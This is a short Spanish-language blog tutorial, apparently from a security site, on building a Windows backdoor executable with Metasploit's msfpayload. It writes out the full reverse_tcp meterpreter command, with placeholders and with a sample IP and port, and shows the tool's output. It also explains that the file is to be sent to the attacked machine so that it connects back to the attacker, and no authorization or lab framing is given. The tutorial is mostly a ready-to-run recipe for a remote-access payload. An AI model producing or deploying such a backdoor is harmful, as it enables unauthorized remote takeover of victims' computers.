Creación de un backdoor ejecutable con Metasploit

Con Metasploit puedes crear un backdoor ejecutable fácilmente con el comando msfpayload, a continuación te mostramos los pasos que debes seguir.

Esto se puede realizar desde el propio Metasploit o incluso sin tener una sesión abierta, en ambos casos el comando es idéntico:

# msfpayload windows/meterpreter/reverse_tcp lhost=<IP_Escucha> lport=<Puerto_Escucha> x > backdoor.exe

Donde IP_Escucha es la IP del servidor que estará esperando la conexión del backdoor, por ejemplo, si utilizas Backtrack para atacar a una máquina, la IP de tu backdoor deberá ser la de tu backtrack, el ejecutable lo mandas a la máquina atacada y cuando se ejecute, el backdoor se conectará a tu Backtrack en el Puerto_Escucha.

Por ejemplo:

[root@tmcent01 ~]# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.5.55 lport=4444 x > backdoor.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“lhost”=>”192.168.5.55”, “lport”=>”4444”}

El archivo backdoor.exe se guarda en la ruta desde la que ejecutaste el comando.

El siguiente es un ejemplo del mismo comando ejecutado desde el propio Metasploit, el resultado es el mismo:

msf > msfpayload windows/meterpreter/reverse_tcp lhost=192.168.5.55 lport=4444 x > backdoor.exe
[*] exec: msfpayload windows/meterpreter/reverse_tcp lhost=192.168.5.55 lport=4444 x > backdoor.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“lhost”=>”192.168.5.55”, “lport”=>”4444”}

Una vez que ya tienes el backdoor deberás iniciar un handler donde podrás escuchar y controlar a la máquina que estás atacando. Para iniciar este handler desde Metasploit te recomendamos nuestro artículo Iniciar un handler de escucha en Metasploit.

También puedes mandarnos tus preguntas y comentarios a nuestra cuenta de Twitter: @redinskala donde encontrarás más información y tips de seguridad.

 

2 thoughts on “Creación de un backdoor ejecutable con Metasploit

  1. Pingback: Iniciar un handler de escucha con Metasploit | RedinSkala

  2. Pingback: Tomar control remoto de una máquina Windows XP / 2003 con Metasploit | RedinSkala

Comments are closed.